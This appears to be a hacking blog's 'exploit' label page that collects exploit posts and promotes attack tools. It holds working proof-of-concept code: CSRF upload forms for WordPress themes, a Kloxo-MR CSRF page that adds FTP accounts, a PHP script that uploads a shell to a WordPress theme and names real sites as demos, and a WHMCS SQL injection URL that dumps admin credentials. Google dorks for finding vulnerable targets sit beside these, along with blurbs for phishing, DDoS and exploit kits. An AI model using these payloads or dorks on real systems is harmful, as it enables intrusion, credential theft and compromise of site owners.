Showing posts with label exploit. Show all posts

Wordpress Templatic Themes CSRF File Upload Vulnerability

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 31/03/2014
#Category : Web Applications
#Type : PHP
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
 
#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
 
CSRF File Upload Vulnerability
 
 
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">
 
<br>
</br>
<input name="uploadfile[]" type="file" />
 
<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>
 
File Access :
 
Note :
Script CSRF equate with dork you use
 
########################################
#Greetz : SANJUNGAN JIWA , All Indonesian H4xor
#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,
########################################
 
# 90952935D5011A31   1337day.com [2014-04-03]   69BF4D7EF87E2E8E #

ExploitSearch.net [Exploit / Vulnerability Search Engine]

Exploitsearch.net, is an attempt at cross referencing/correlating exploits and vulnerability data from various sources and making the resulting database available to everyone. 

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source databases/websites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching. 

Kloxo-MR 6.5.0 CSRF Vulnerability

# Exploit Title     :Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage   :https://github.com/mustafaramadhan/kloxo/tree/dev
# Version   :Kloxo-MR 6.5.0.f-2014020301
# Tested on         :Centos 6.4
# Exploit Author    :Necmettin COSKUN =>@babayarisi
# Blog              :http://www.ncoskun.com http://www.grisapka.org
# Discovery date    :03/12/2014
# CVE               :N/A
  
Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
================
CSRF Vulnerability
  
Vulnerability
================
Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
 
Poc Exploit
================
 
 <html>
 <head><title>Kloxo-MR demo</title></head>
 <script type="text/javascript">
 function yurudi(){
        ///////////////////////////////////////////////////////////
        //Kloxo-MR 6.5.0  CSRF Vulnerability         //
        //Author:Necmettin COSKUN => twitter.com/@babayarisi  //
        //Blog: http://www.ncoskun.com | http://www.grisapka.org //
        ///////////////////////////////////////////////////////////
        //Remote host
        var host="victim.com"; 
        //New Ftp Username
        var username="demouser";
        //New Ftp Password
        var pass="12345678";
        //This creates new folder under admin dir. /admin/yourfolder
        var dir="demodirectory";
        //If necessary only modify http to https ;)
        var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
 
        document.getElementById('demoexploit').src=urlson;
}
 </script>
 <body onload="yurudi();">
 <img id="demoexploit" src=""></img>
 </body>
 </html>
  
  
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!

XSS ChEF - Chrome Extension Exploitation Framework



Another interesting tool was drawn to my attention yesterday - Chrome Extension Exploitation Framework or XSS ChEF, which exploits XSS vulnerabilities in Chrome extensions. What you can acctualy do with this tool (when you have appropriate privileges):
 - Monitor open tabs of victims
 - Execute JS on every tab (global XSS)
 - Extract HTML, read/write cookies (also httpOnly), localStorage
 - Get and manipulate browser history
 - Stay persistent until whole browser is closed (or even futher if you can persist in extensions localStorage)
 - Make screenshot of victims window
 - Further exploit e.g. via attaching BeEF hooks, keyloggers etc.
 - Explore filesystem through file:// protocol
 - Bypass Chrome extensions content script sandbox to interact directly with page JS
Demo video:

Demo video 2:

More information about XSS ChEF @ : http://blog.kotowicz.net/2012/07/xss-chef-chrome-extension-exploitation.html
Download from github: https://github.com/koto/xsschef

Simple Phishing Toolkit

Today I came across to a new tool which seems to be interesting - SP Toolkit (Simple Phishing Toolkit). Since phishing is one of the biggest problem in IT security it seems logical to build a toolkit to test people/customers/organizations for phising emails. Combined with some other tools, e.g. metasploit, this could be a very useful tool when performing a pentest. The authors of the toolkit are information security proffesionals who needed a tool for phishing attacks, so they wrote a toolkit. From the website:
spt is a simple concept with powerful possibilities.  It is what it’s name implies:  a simple phishing toolkit.
The basic idea we (the spt project) had was that wouldn’t it be cool if there were a simple, effective, easy to use and free (most importantly!) tool that information security professionals could use to evaluate and train what we all know is the weakest link in any security minded organization:  the people.  Since the founders of the spt project are themselves information security professionals by day (and possibly either LOL cats or zombies by night), they themselves faced the frustration of dealing with people within their own organizations that claimed to know better, but 9 times out of 10 fell for the most absurdly obvious phishing emails ever seen.  A malware outbreak here, a stolen password and loss of critical organizational data there and the costs of dealing with the results of phishing can get to be astronomical pretty darn quickly!...
  
More information @: http://www.sptoolkit.com/
Watch the video:

IP-DiggER v 3.0 - The WeB Xploit3r by Team FreakCoderz

Features
PHP Server Based

SQLI Websites
XSS Websites
LFI Websites
RFI Websites
Admin Panels
Upload Vulnerability

ASP Server Based

ASP SQLI Websites
ASP XSS Websites
ASP Admin Panels
ASP Upload Vulnerability

Website Related Tools

Wordpress Website Finder
Joomla Website Finder
Sub Domain Scanner
Web Terminator ( DDos Attack )
IP Resolver
NS Lookup
Joomla Website Vulnerability Scanner

[Download]

Exploit Pack [The most advanced and easy to use tool for pentesters]

Exploit Pack is an open source GPLv3 licensed bundle of scripts ( known as exploits ) with an easy to use GUI and a SID IDE. It’s built on JAVA and Python, which means it’s easy to customize and works very nicely on any device. Like every software that has an open source license you can patch, extend or add your own ideas to it. Just checkout the code and go for it. This tool was made thinking on the end-user, it's not going to replace any other security tool on the market, but it's for sure a must-have for every security enthusiast, researcher or paranoid user.

It's easy to use

Hello script kiddie. Don't you worry, you can always use this tool without reading any kind of documentation. But shame on you.

Multi OS support

It was developed thinking on multi platform support by default for x86 but it will run on Windows, Linux, FreeBSD and Mac OSX.

IDE for Exploit Dev's

A must-have for effective exploit development, extend or add more features and include your own exploit codes. 

WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability

######################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-r...io/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
######################################################


= = = = = = = =
1)Exploit =
2)Real Demo =
= = = = = = = =

1)Exploit :
= = = = = =

<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp..._image.php
http://www.alias-photo.com/wp-content/th..._image.php
http://www.manuel-portela.com/wp-content..._image.php
# #### #### #### #### #### #### #### #### #

Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

# #### #### #### #### #### #### #### #### #
# Facebook Profile : http://www.fb.com/smailmax
# E-mail : ur0@hotmail.com
# #### #### #### #### #### #### #### #### #
##### Fi Khatr : > Smail Fox, Ped Rou, Ŝimõõw Any #####
##### Safouane Saw, RootMax, DrShano, Novice Exe #####
##### Abdelaziz Babiz, Youness El Amri, Salah Soultan #####
##### Âh Mêd, Docteur Virùs, Le-MîSstèr Tàriik #####
##### Sam7o Li Ila Nsit Chi Wa7d :( ./Smail Max #####
##### W A L I D A <3 #####

WHMCS 0day Auto Exploiter <= 5.2.8

inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:"Powered by WHMCompleteSolution"
intext:"Powered by WHMCompleteSolution" inurl:clientarea.php
inurl:announcements.php intext:"WHMCompleteSolution"
intext:"Powered by WHMCS"


Here is the PHP code that you must save as WHMCS-Fucker.php:

WHMCS 4.x SQL Injection Vulnerability

# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php‎"‎
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and perior versions should be affected too
# Tested on: Linux

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    - Vulnerable Code Snippet :
   
      LINE 582: function pdfInvoice($id)
      LINE 583: {
      LINE 686: if ($CONFIG['GroupSimilarLineItems'])
      LINE 687: {
      LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
      LINE 689: }
     
     As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection
     It appears that pdfInvoice function is being called at "/dl.php" file as the following:
   
   
      LINE 21: if ($type == 'i')
      LINE 22: {
      LINE 23: $result     = select_query('tblinvoices', '', array(
      LINE 24: 'id' => $id
      LINE 25: ));
      LINE 26: $data       = mysql_fetch_array($result);
      LINE 27: $invoiceid  = $data['id'];
      LINE 28: $invoicenum = $data['invoicenum'];
      LINE 29: $userid     = $data['userid'];
      LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
      LINE 31: {
      LINE 32: downloadLogin();
      LINE 33: }
      LINE 34: if (!$invoicenum)
      LINE 35: {
      LINE 36: $invoicenum = $invoiceid;
      LINE 37: }
      LINE 38: require('includes/clientfunctions.php');
      LINE 39: require('includes/countries.php');
      LINE 40: require('includes/invoicefunctions.php');
      LINE 41: require('includes/tcpdf.php');
      LINE 42: $pdfdata = pdfInvoice($id);
      LINE 43: header('Pragma: public');
      LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
      LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
      LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
      LINE 47: header('Cache-Control: private', false);
      LINE 48: header('Content-Type: application/octet-stream');
      LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
      LINE 50: header('Content-Transfer-Encoding: binary');
      LINE 51: echo $pdfdata;
      LINE 52: exit();
      LINE 53: return 1;
      LINE 54: }
     
     
      As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization
      Afterwards it force the browser to download the generated invoice in PDF format
   
      - Proof of Concept for Exploitation
   
        To Dump Administrator Credentials (user & pass):
     
        http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
     
        ~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there :)
       
      - Precondition to Successfully Exploit the Vulnerability:
   
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )

      - Credits:

        Ahmed Aboul-Ela - Information Security Consultant @ Starware Group

Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.